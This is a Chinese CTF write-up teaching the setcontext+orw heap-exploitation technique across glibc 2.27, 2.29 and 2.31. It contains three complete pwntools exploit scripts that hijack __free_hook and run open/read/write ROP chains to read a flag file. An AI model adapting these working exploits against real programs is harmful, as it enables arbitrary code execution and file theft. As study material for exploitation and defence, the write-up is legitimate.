setcontext+orw

setcontext+orw 大致可以把2.27,2.29做为两个分界点。

我们先来讨论 2.27 及以下的 setcontext + orw 的写法。

首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模板如下:

frame = SigreturnFrame()
frame.rsp = xxx
frame.rdi = xxx
frame.rsi = xxx
frame.rdx = xxx
frame.rip = xxx

它实质上就是依靠 setcontext 来实现的,我们从 IDA 里看看它究竟啥样。

我们可以很清楚地看出它的作用是通过 rdi 寄存器里的地址附近的地址里的值来给设置各个寄存器的值。glibc2.27 我们通常从 setcontext + 53 开始使用,也就是 mov   rsp, [rdi+0A0h] 那一行,在阅读其他师傅的文章后知道是因为上面的 fldenv  byte pte [rcx] 会造成程序执行时直接 crash。从 setcontext + 53 开始我们可以看到我们会给各个寄存器赋值。值得注意的是,mov     rcx, [rdi+0A8h]  和 push  rcx 实质上是在给我们的 rip 进行赋值。而众多寄存器唯一不可控制的是 rax寄存器,因为不仅没给 rax 赋值还在最后有一个 xor  eax,eax 。但这也意味着我们一定可以把 rax 设置成 0 。大部分题目中通过控制 rsp 和 rip 就可以很好地解决堆题不方便直接控制程序的执行流的问题。我们通常是吧 setcontext + 53 写进 __free_hook 或者 __malloc_hook 中,然后建立或者释放一个堆块,此时的 rdi 就会是该堆块的 chunk 头,那如果我们提前布局好堆,就意味着我们可以控制寄存器并劫持程序的执行流。

大体上思路差不多是两种(此处仅讨论 orw),第一种是直接控制程序执行流去执行ROP链,另一种是先用 mprotect 函数开辟一段可读可写可执行的空间再跳到上面去执行 shellcode。个人是比较喜欢直接执行 ROP 链的方法。

拿一个国赛的题 silverwolf 来加深 2.27 setcontext+orw

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

s = process('./silverwolf')
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so')

def add(size):
    s.sendlineafter(b'Your choice: ', b'1')
    s.sendlineafter(b'Index: ', b'0')
    s.sendlineafter(b'Size: ', str(size))

def edit(content):
    s.sendlineafter(b'Your choice: ', b'2')
    s.sendlineafter(b'Index: ', b'0')
    s.sendlineafter(b'Content: ', content)

def show():
    s.sendlineafter(b'Your choice: ', b'3')
    s.sendlineafter(b'Index: ', b'0')

def delete():
    s.sendlineafter(b'Your choice: ', b'4')
    s.sendlineafter(b'Index: ',b'0')

for i in range(7):
    add(0x78)
delete()
edit(b'a'*0x10)
delete()

show()
s.recvuntil(b'Content: ')
heap_base = u64(s.recv(6).ljust(8,b'\x00')) & 0xfffffffffffff000
success('heap_base=>' + hex(heap_base))

add(0x78)
edit(p64(heap_base + 0x10))
add(0x78)
add(0x78)
edit(b'\x00'*0x23 + b'\x07')
delete()

show()
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base=>' + hex(libc_base))

pop_rdi_ret = libc_base + 0x00000000000215bf
pop_rsi_r15_ret = libc_base + 0x00000000000215bd
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x0000000000043ae8
syscall_ret = libc_base + libc.sym['read'] + 0xf
ret = libc_base + 0x00000000000008aa

__free_hook = libc_base + libc.sym['__free_hook']
setcontext_53 = libc_base + libc.sym['setcontext'] + 53
write_addr = libc_base + libc.sym['write']

flag_addr = heap_base + 0x1000
stack_addr_1 = heap_base + 0x2000
stack_addr_2 = heap_base + 0x20a0
orw_addr_1 = heap_base + 0x3000
orw_addr_2 = heap_base + 0x3060

orw = p64(pop_rdi_ret) + p64(flag_addr)
orw+= p64(pop_rsi_r15_ret) + p64(0) + p64(0) 
orw+= p64(pop_rax_ret) + p64(2) 
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(3)
orw+= p64(pop_rsi_r15_ret) + p64(heap_base + 0x4000) + p64(0)
orw+= p64(pop_rdx_ret) + p64(0x100)
orw+= p64(pop_rax_ret) + p64(0)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(1)
orw+= p64(pop_rsi_r15_ret) + p64(heap_base + 0x4000) + p64(0)
orw+= p64(pop_rdx_ret) + p64(0x100)
orw+= p64(write_addr) #0xd0

payload = b'\x02'*0x40
payload+= p64(__free_hook)   #0x20
payload+= p64(flag_addr)     #0x30
payload+= p64(0)             #0x40
payload+= p64(stack_addr_1)  #0x50
payload+= p64(stack_addr_2)  #0x60
payload+= p64(orw_addr_1)    #0x70
payload+= p64(orw_addr_2)    #0x80

edit(payload)

add(0x10)
edit(p64(setcontext_53))

add(0x20)
edit(b'./flag')

add(0x50)
edit(p64(orw_addr_1) + p64(ret))

add(0x60)
edit(orw[:0x60])

add(0x70)
edit(orw[0x60:])

add(0x40)
delete()

#gdb.attach(s)
s.interactive()

 

接下来我们来看 2.29 的 setcontext + orw ,2.29 最大的变动就是 setcontext 里控制寄存器由 rdi 变成了 rdx,这就使得我们无法通过直接控制 free 的堆块来控制寄存器。所以我们要用到一些 gadget 来把 rdi 和 rdx 转换一下。

 在2.29里我认为这两个 gadget 比较好用,我先选择了下一个,如果我们把 __free_hook 改成了这个 magic_gadget,再去 free 一个我们布局好的堆块。这个堆块把 rdi+8 地址里的值改为我们布好偏移的堆块的地址,再把 rdi 的值改为 setcontext+53 的值。 free 这个堆块其实就是在把 rdi 设置好的情况下,去执行了 setcontext 来控制寄存器。

 

拿 2019-BALSN-CTF-plaintext 来加深 2.29 的setcontext + orw

有一个 2.29 的 off by null,在off by null 那一篇文章提到过。且这里为了好调试,我关闭了本地aslr。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

s = process('./plaintext')
libc = ELF('./glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')

def add(size,content):
    s.sendlineafter(b'Choice: ' , b'1')
    s.sendlineafter(b'Size: ' , str(size))
    s.sendafter(b'Content: ' , content)

def delete(index):
    s.sendlineafter(b'Choice: ' , b'2')
    s.sendlineafter(b'Idx: ' , str(index))

def show(index):
    s.sendlineafter(b'Choice: ' , b'3')
    s.sendlineafter(b'Idx: ' , str(index))

def clean():
    for i in range(2):
        add(0xe0 , b'a') # 0-1
    for i in range(5):
        add(0xc0 , b'a') # 2-6
    for i in range(9):
        add(0x70 , b'a') # 7-15
    for i in range(16):
        add(0x60 , b'a') # 16-31
    for i in range(16):
        add(0x10 , b'a') # 32-47
    for i in range(8):
        add(0x1000 , b'a') # 48-55
    add(0xb70 ,b'a') # 56

clean() # clean bins prouced by seccomp and make second byte of the address of large bin is \x00

for i in range(7):
    add(0x28 , b't') # 57-63

add(0xb20 ,b'large') # 64
add(0x10 ,b'a') # 65
delete(64)
add(0x1000 ,b'a') # 64 make old chunk_64 to large bin

add(0x28 , p64(0) + p64(0x521) + p8(0x40)) # 66

# make fake_chunk's fd->bk = fake_chunk

add(0x28 ,b'a') # 67
add(0x28 ,b'a') # 68
add(0x28 ,b'a') # 69
add(0x28 ,b'a') # 70

for i in range(7):
    delete(i+57) # full tcache

delete(69)
delete(67)

for i in range(7):
    add(0x28 , b't') # 57-63

add(0x400 ,b'a') # 47 touch off malloc_consolidate()

add(0x28 ,p64(0) + p8(0x20)) # 49 successfully make fake_chunk's fd->bk = fake_chunk

# make fake_chunk's bk->fd = fake_chunk

add(0x28 ,b'clean') # 71 clean tcache

for i in range(7):
    delete(i+57) # full tcache

delete(68)
delete(66)

for i in range(7):
    add(0x28 , b't') # 57-63

add(0x28 ,p8(0x20)) # 66

# off by null

add(0x28 ,b'clean') # 68

add(0x28 ,b'a')  # 72
add(0x5f8 ,b'a') # 73
add(0x100 ,b'a') # 74

delete(72)
add(0x28 ,b'\x00'*0x20 + p64(0x520)) # 72
delete(73)

# leak libc and heap addr

add(0x40 ,b'a') # 73

show(68)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base=>' + hex(libc_base))

add(0x28 ,b'a') # 75 = 68

delete(57)
delete(68)

show(75)
heap_base_addr = u64(s.recv(6).ljust(8,b'\x00')) + 0x1e0 - 0x10
success('heap_base_addr=>' + hex(heap_base_addr))

__free_hook = libc_base + libc.sym['__free_hook']
setcontext_53 = libc_base + libc.sym['setcontext'] + 53
magic_gadget = libc_base + 0x000000000012be97

'''
mov rdx, qword ptr [rdi + 8];
mov rax, qword ptr [rdi];
mov rdi, rdx;
jmp rax;
'''

pop_rax_ret = libc_base + 0x0000000000047cf8
pop_rdi_ret = libc_base + 0x0000000000026542
pop_rsi_ret = libc_base + 0x0000000000026f9e
pop_rdx_ret = libc_base + 0x000000000012bda6
ret_addr = libc_base + 0x000000000002535f
syscall_ret = libc_base + libc.sym['read'] + 0xf


# setcontext
add(0x28 ,b'a') # 57 = 75
add(0x28 ,b'a') # 68

delete(70)
add(0x40 ,p64(0)*5 + p64(0x31) + p64(__free_hook)) # 70
add(0x28 ,b'a') # 76
add(0x28 ,p64(magic_gadget)) # 77

flag_addr = heap_base_addr + 0x60 + 0x10
fake_stack_addr = heap_base_addr + 0x60 + 0x30 - 0xa0
orw_addr = heap_base_addr + 0x60 + 0x10 + 0x50 
bss_addr = libc_base + libc.bss()

add(0x28 ,p64(setcontext_53) + p64(fake_stack_addr) + b'./flag\x00\x00') # 78

add(0x28 ,p64(orw_addr) + p64(ret_addr)) # 79


orw = p64(pop_rdi_ret) + p64(flag_addr)
orw+= p64(pop_rsi_ret) + p64(0)
orw+= p64(pop_rax_ret) + p64(2)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(3)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_ret) + p64(0xe)
orw+= p64(pop_rax_ret) + p64(0)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(1)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_ret) + p64(0xe)
orw+= p64(pop_rax_ret) + p64(1)
orw+= p64(syscall_ret)

add(0x100 ,orw) # 80

#gdb.attach(s)
delete(78)

s.interactive()

 

接下来就是 2.31 的 setcontext+orw

和之前版本的区别是setcontext 的位置变成了 setcontext+61

 

 而且之前 2.29 发现的gadget只剩下一个了

 

我们把那个 plaintext 重新用2.31编译了一下,且没开沙盒这样就可以省去填充沙盒开辟出来的堆块的步骤了。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

s = process('./note1')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def add(size,content):
    s.recvuntil(b'Choice: ')
    s.sendline(b'1')
    s.recvuntil(b'size: ')
    s.sendline(str(size))
    s.recvuntil(b'content: ')
    s.send(content)

def delete(index):
    s.recvuntil(b'Choice: ')
    s.sendline(b'2')
    s.recvuntil(b'idx: ')
    s.sendline(str(index))

def show(index):
    s.recvuntil(b'Choice: ')
    s.sendline(b'3')
    s.recvuntil(b'idx: ')
    s.sendline(str(index))    

for i in range(6):
    add(0x1000 ,b'a') # 0-5

add(0x1000 - 0x410 ,b'a') # 6

for i in range(7):
    add(0x28 ,b't')   # 7-13

add(0xb20 ,b'large') # 14 chunk head address is 0x......0040
add(0x10 ,b'a') # 15

delete(14)
add(0x1000 ,b'a') # 14

add(0x28 ,p64(0) + p64(0x521) + p8(0x70)) # 16

# make fake_chunk's fd->bk = fake_chunk

add(0x28 ,b'a') # 17
add(0x28 ,b'a') # 18
add(0x28 ,b'a') # 19
add(0x28 ,b'a') # 20


for i in range(7):
    delete(i+7)

delete(19)
delete(17)

for i in range(7):
    add(0x28 ,b't')   # 7-13

add(0x400 ,b'a') # 17
add(0x28 ,p64(0) + p8(0x50)) # 19

# make fake_chunk's bk->fd = fake_chunk

add(0x28 ,b'a') # 21 clean tcache

for i in range(7):
    delete(i+7)

delete(18)
delete(16)

for i in range(7):
    add(0x28 ,b't')   # 7-13

add(0x28 ,p8(0x50)) # 16

# off by null

add(0x28 ,b'a') # 18 clean fastbin

add(0x28 ,b'a') # 22
add(0x5f8 ,b'a') # 23
add(0x100 ,b'a') # 24
 
delete(22)
add(0x28 ,b'a'*0x20 + p64(0x520)) # 22
delete(23)

# leak libc and heap

add(0x18 ,b'a') # 23

show(19)

libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base=>' + hex(libc_base))

add(0x28 ,b'a') # 25
add(0x28 ,b'a') # 26=18

delete(20)
delete(18)
show(26)

heap = u64(s.recv(6).ljust(8,b'\x00'))
success(hex(heap))

add(0x28 ,b'a') # 18=26
add(0x28 ,b'a') # 20

__free_hook = libc_base + libc.sym['__free_hook']
setcontext_61 = libc_base + libc.sym['setcontext'] + 61
magic_gadget = libc_base + 0x0000000000154930
bss_addr = libc_base + libc.bss()

pop_rax_ret = libc_base + 0x000000000004a550
pop_rdi_ret = libc_base + 0x0000000000026b72
pop_rsi_ret = libc_base + 0x0000000000027529
pop_rdx_r12_ret = libc_base + 0x000000000011c371
syscall_ret = libc_base + libc.sym['read'] + 0x10
ret_addr = libc_base + 0x0000000000025679

stack_addr = heap + 0x40
orw_addr = heap + 0x100

'''
mov rdx, qword ptr [rdi + 8];
mov qword ptr [rsp], rax;
call qword ptr [rdx + 0x20];
'''

# attack

delete(18)
delete(20)
add(0x40 ,b'a'*0x20 + p64(0) + p64(0x31) + p64(__free_hook)) #18
add(0x20 ,b'a') # 20
add(0x20 ,p64(magic_gadget)) # 27

add(0x10 , p64(0) + p64(stack_addr)) # 28
success(hex(stack_addr))

stack = b'./flag\x00\x00' + p64(0)*3 + p64(setcontext_61)
stack+= b'\x00'*(0xa0-0x28)
stack+= p64(orw_addr) + p64(ret_addr)

add(0xb0 ,stack) # 29

orw = p64(pop_rdi_ret) + p64(stack_addr)
orw+= p64(pop_rax_ret) + p64(2)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(3)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
orw+= p64(pop_rax_ret) + p64(0)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(1)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
orw+= p64(pop_rax_ret) + p64(1)
orw+= p64(syscall_ret)

add(0x100 ,orw) # 30
#gdb.attach(s)
delete(28)


s.interactive()

 

附件

提取码:efi9

 

参考链接

//blog.csdn.net/yongbaoii/article/details/119544590

//blog.csdn.net/carol2358/article/details/107115485

//blog.csdn.net/A951860555/article/details/118268484

//blog.csdn.net/weixin_43960998/article/details/115838190

Tags: